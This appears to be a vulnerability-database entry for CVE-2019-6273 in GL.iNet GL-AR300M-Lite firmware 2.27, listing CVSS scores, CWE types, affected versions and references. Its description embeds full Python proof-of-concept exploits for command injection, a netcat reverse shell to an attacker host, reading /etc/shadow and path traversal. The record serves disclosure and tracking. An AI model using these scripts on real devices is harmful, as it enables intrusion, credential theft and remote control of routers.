Details of VAR-201903-0451

ID

VAR-201903-0451

CVE

CVE-2019-6273

TITLE

GL.iNet GL-AR300M-Lite Vulnerability related to access control in device firmware

Trust: 0.8

sources: JVNDB: JVNDB-2019-002795

DESCRIPTION

download_file in GL.iNet GL-AR300M-Lite devices with firmware 2.27 allows remote attackers to download arbitrary files. GL.iNet GL-AR300M-Lite There is an access control vulnerability in the device firmware.Information may be obtained. The GL-AR300M-Lite is a smart wireless router. There is a security vulnerability in GL-AR300M-Lite version 2.27. # Exploit Title: GL-AR300M-Lite Authenticated Command injection - Arbitrary file download - Directory Traversal # Date: 15/1/2019 # Exploit Author: Pasquale Turi aka boombyte # Vendor Homepage: https://www.gl-inet.com/ # Software Link: https://www.gl-inet.com/products/gl-ar300m/ # Version: Firmware version 2.27 # CVE : CVE-2019-6272 - CVE-2019-6273 - CVE-2019-6274 - CVE-2019-6275 #CVE-2019-6272 PoC (Command injection): import requests rhost='RHOST' lhost='LHOST' lport ='LPORT' password='PASSWORD' r=requests.get('http://'+rhost+'/login.html') cookie=r.cookies r2=requests.get('http://'+rhost+'/cgi-bin/login_cgi?action=checklogin',cookies=cookie) header={'X-CSRF-TOKEN':r2.text[13:45]} r3=requests.post('http://'+rhost+'/cgi-bin/login_cgi',headers=header,cookies=r2.cookies,data={'action':'login','password':password,'code':''}) header={'X-CSRF-TOKEN':r3.text[31:63]} r4=requests.post('http://'+rhost+'/cgi-bin/login_cgi',headers=header,cookies=r3.cookies,data={'action':'settimezone','timezone':'`nc '+lhost+' '+lport+' -e /bin/ash`'}) #CVE-2019-6273 (Arbitrary file download) PoC: import requests rhost='RHOST' password='PASSWORD' file_path='/etc/shadow' r=requests.get('http://'+rhost+'/login.html') cookie=r.cookies r2=requests.get('http://'+rhost+'/cgi-bin/login_cgi?action=checklogin',cookies=cookie) header={'X-CSRF-TOKEN':r2.text[13:45]} r3=requests.post('http://'+rhost+'/cgi-bin/login_cgi',headers=header,cookies=r2.cookies,data={'action':'login','password':password,'code':''}) header={'X-CSRF-TOKEN':r3.text[31:63]} r4=requests.get('http://'+rhost+'/cgi-bin/download_file?/mnt/..'+file_path,headers=header,cookies=r3.cookies) print r4.text #CVE-2019-6274 (Path Trasversal) PoC: import requests rhost='RHOST' password='PASSWORD' path='/' r=requests.get('http://'+rhost+'/login.html') cookie=r.cookies r2=requests.get('http://'+rhost+'/cgi-bin/login_cgi?action=checklogin',cookies=cookie) header={'X-CSRF-TOKEN':r2.text[13:45]} r3=requests.post('http://'+rhost+'/cgi-bin/login_cgi',headers=header,cookies=r2.cookies,data={'action':'login','password':password,'code':''}) header={'X-CSRF-TOKEN':r3.text[31:63]} r4=requests.get('http://'+rhost+'/cgi-bin/storage_cgi?id=2&pwd='+path,headers=header,cookies=r3.cookies) print r4.text #CVE-2019-6275 (Another command injection): import requests rhost='RHOST' lhost='LHOST' lport ='LPORT' password='PASSWORD' r=requests.get('http://'+rhost+'/login.html') cookie=r.cookies r2=requests.get('http://'+rhost+'/cgi-bin/login_cgi?action=checklogin',cookies=cookie) header={'X-CSRF-TOKEN':r2.text[13:45]} r3=requests.post('http://'+rhost+'/cgi-bin/login_cgi',headers=header,cookies=r2.cookies,data={'action':'login','password':password,'code':''}) header={'X-CSRF-TOKEN':r3.text[31:63]} r4=requests.post('http://'+rhost+'/cgi-bin/firmware_cgi?action=setautoupdate&auto_update=off&update_time=04%3a00%7cecho%20qydre8t159%201%7c%7ca%20%23\'%20%7cecho%20%20%60id%60%7c%7ca%20%23%7c%22%20%7cecho%20a%201%7c%7ca%20%23&_=1547223055153 ',headers=header,cookies=r3.cookies,) print r4.text

Trust: 2.34

sources: NVD: CVE-2019-6273 // JVNDB: JVNDB-2019-002795 // CNVD: CNVD-2019-02391 // VULHUB: VHN-157708 // PACKETSTORM: 151207

IOT TAXONOMY

category:

['Network device']

sub_category:

Trust: 0.6

sources: CNVD: CNVD-2019-02391

AFFECTED PRODUCTS

vendor:	gl inet	model:	gl-ar300m-lite	scope:	eq	version:	2.27	Trust: 1.8
vendor:	gl ar300m lite	model:	gl-ar300m-lite	scope:	eq	version:	2.27	Trust: 0.6

sources: CNVD: CNVD-2019-02391 // JVNDB: JVNDB-2019-002795 // NVD: CVE-2019-6273

CVSS

SEVERITY

CVSSV2

CVSSV3

nvd@nist.gov:	CVE-2019-6273
value:	MEDIUM
Trust: 1.0
NVD:	CVE-2019-6273
value:	MEDIUM
Trust: 0.8
CNVD:	CNVD-2019-02391
value:	MEDIUM
Trust: 0.6
CNNVD:	CNNVD-201901-728
value:	MEDIUM
Trust: 0.6
VULHUB:	VHN-157708
value:	MEDIUM
Trust: 0.1

nvd@nist.gov:	CVE-2019-6273
severity:	MEDIUM
baseScore:	4.0
vectorString:	AV:N/AC:L/AU:S/C:P/I:N/A:N
accessVector:	NETWORK
accessComplexity:	LOW
authentication:	SINGLE
confidentialityImpact:	PARTIAL
integrityImpact:	NONE
availabilityImpact:	NONE
exploitabilityScore:	8.0
impactScore:	2.9
acInsufInfo:	NONE
obtainAllPrivilege:	NONE
obtainUserPrivilege:	NONE
obtainOtherPrivilege:	NONE
userInteractionRequired:	NONE
version:	2.0
Trust: 1.8
CNVD:	CNVD-2019-02391
severity:	MEDIUM
baseScore:	5.0
vectorString:	AV:N/AC:L/AU:N/C:P/I:N/A:N
accessVector:	NETWORK
accessComplexity:	LOW
authentication:	NONE
confidentialityImpact:	PARTIAL
integrityImpact:	NONE
availabilityImpact:	NONE
exploitabilityScore:	10.0
impactScore:	2.9
acInsufInfo:	NONE
obtainAllPrivilege:	NONE
obtainUserPrivilege:	NONE
obtainOtherPrivilege:	NONE
userInteractionRequired:	NONE
version:	2.0
Trust: 0.6
VULHUB:	VHN-157708
severity:	MEDIUM
baseScore:	4.0
vectorString:	AV:N/AC:L/AU:S/C:P/I:N/A:N
accessVector:	NETWORK
accessComplexity:	LOW
authentication:	SINGLE
confidentialityImpact:	PARTIAL
integrityImpact:	NONE
availabilityImpact:	NONE
exploitabilityScore:	8.0
impactScore:	2.9
acInsufInfo:	NONE
obtainAllPrivilege:	NONE
obtainUserPrivilege:	NONE
obtainOtherPrivilege:	NONE
userInteractionRequired:	NONE
version:	2.0
Trust: 0.1

nvd@nist.gov:	CVE-2019-6273
baseSeverity:	MEDIUM
baseScore:	6.5
vectorString:	CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
attackVector:	NETWORK
attackComplexity:	LOW
privilegesRequired:	LOW
userInteraction:	NONE
scope:	UNCHANGED
confidentialityImpact:	HIGH
integrityImpact:	NONE
availabilityImpact:	NONE
exploitabilityScore:	2.8
impactScore:	3.6
version:	3.0
Trust: 1.8

sources: CNVD: CNVD-2019-02391 // VULHUB: VHN-157708 // JVNDB: JVNDB-2019-002795 // CNNVD: CNNVD-201901-728 // NVD: CVE-2019-6273

PROBLEMTYPE DATA

problemtype:	CWE-22	Trust: 1.1
problemtype:	CWE-284	Trust: 0.9

sources: VULHUB: VHN-157708 // JVNDB: JVNDB-2019-002795 // NVD: CVE-2019-6273

THREAT TYPE

remote

Trust: 0.6

sources: CNNVD: CNNVD-201901-728

TYPE

path traversal

Trust: 0.6

sources: CNNVD: CNNVD-201901-728

CONFIGURATIONS

sources: JVNDB: JVNDB-2019-002795

PATCH

title:

GL-AR300M

url:

https://www.gl-inet.com/products/gl-ar300m/

Trust: 0.8

sources: JVNDB: JVNDB-2019-002795

EXTERNAL IDS

db:	NVD	id:	CVE-2019-6273	Trust: 3.2
db:	PACKETSTORM	id:	151207	Trust: 2.6
db:	EXPLOIT-DB	id:	46179	Trust: 2.3
db:	JVNDB	id:	JVNDB-2019-002795	Trust: 0.8
db:	CNNVD	id:	CNNVD-201901-728	Trust: 0.7
db:	CNVD	id:	CNVD-2019-02391	Trust: 0.6
db:	VULHUB	id:	VHN-157708	Trust: 0.1

sources: CNVD: CNVD-2019-02391 // VULHUB: VHN-157708 // JVNDB: JVNDB-2019-002795 // PACKETSTORM: 151207 // CNNVD: CNNVD-201901-728 // NVD: CVE-2019-6273

REFERENCES

url:	http://packetstormsecurity.com/files/151207/gl-ar300m-lite-2.2.7-command-injection-directory-traversal.html	Trust: 3.1
url:	https://www.exploit-db.com/exploits/46179/	Trust: 1.7
url:	https://nvd.nist.gov/vuln/detail/cve-2019-6273	Trust: 1.5
url:	https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-6273	Trust: 0.8
url:	https://www.exploit-db.com/exploits/46179	Trust: 0.6
url:	https://nvd.nist.gov/vuln/detail/cve-2019-6275	Trust: 0.1
url:	http://'+rhost+'/cgi-bin/firmware_cgi?action=setautoupdate&auto_update=off&update_time=04%3a00%7cecho%20qydre8t159%201%7c%7ca%20%23\'%20%7cecho%20%20%60id%60%7c%7ca%20%23%7c%22%20%7cecho%20a%201%7c%7ca%20%23&_=1547223055153	Trust: 0.1
url:	https://nvd.nist.gov/vuln/detail/cve-2019-6274	Trust: 0.1
url:	https://www.gl-inet.com/	Trust: 0.1
url:	http://'+rhost+'/cgi-bin/login_cgi?action=checklogin',cookies=cookie)	Trust: 0.1
url:	http://'+rhost+'/cgi-bin/login_cgi',headers=header,cookies=r2.cookies,data={'action':'login','password':password,'code':''})	Trust: 0.1
url:	http://'+rhost+'/cgi-bin/login_cgi',headers=header,cookies=r3.cookies,data={'action':'settimezone','timezone':'`nc	Trust: 0.1
url:	http://'+rhost+'/cgi-bin/download_file?/mnt/..'+file_path,headers=header,cookies=r3.cookies)	Trust: 0.1
url:	http://'+rhost+'/cgi-bin/storage_cgi?id=2&pwd='+path,headers=header,cookies=r3.cookies)	Trust: 0.1
url:	https://www.gl-inet.com/products/gl-ar300m/	Trust: 0.1
url:	https://nvd.nist.gov/vuln/detail/cve-2019-6272	Trust: 0.1
url:	http://'+rhost+'/login.html')	Trust: 0.1

sources: CNVD: CNVD-2019-02391 // VULHUB: VHN-157708 // JVNDB: JVNDB-2019-002795 // PACKETSTORM: 151207 // CNNVD: CNNVD-201901-728 // NVD: CVE-2019-6273

CREDITS

Pasquale Turi

Trust: 0.1

sources: PACKETSTORM: 151207

SOURCES

db:	CNVD	id:	CNVD-2019-02391
db:	VULHUB	id:	VHN-157708
db:	JVNDB	id:	JVNDB-2019-002795
db:	PACKETSTORM	id:	151207
db:	CNNVD	id:	CNNVD-201901-728
db:	NVD	id:	CVE-2019-6273

LAST UPDATE DATE

2024-11-23T21:52:27.566000+00:00

SOURCES UPDATE DATE

db:	CNVD	id:	CNVD-2019-02391	date:	2019-01-22T00:00:00
db:	VULHUB	id:	VHN-157708	date:	2020-08-24T00:00:00
db:	JVNDB	id:	JVNDB-2019-002795	date:	2019-04-22T00:00:00
db:	CNNVD	id:	CNNVD-201901-728	date:	2020-08-25T00:00:00
db:	NVD	id:	CVE-2019-6273	date:	2024-11-21T04:46:21.100

SOURCES RELEASE DATE

db:	CNVD	id:	CNVD-2019-02391	date:	2019-01-22T00:00:00
db:	VULHUB	id:	VHN-157708	date:	2019-03-21T00:00:00
db:	JVNDB	id:	JVNDB-2019-002795	date:	2019-04-22T00:00:00
db:	PACKETSTORM	id:	151207	date:	2019-01-16T23:32:22
db:	CNNVD	id:	CNNVD-201901-728	date:	2019-01-17T00:00:00
db:	NVD	id:	CVE-2019-6273	date:	2019-03-21T16:01:07.780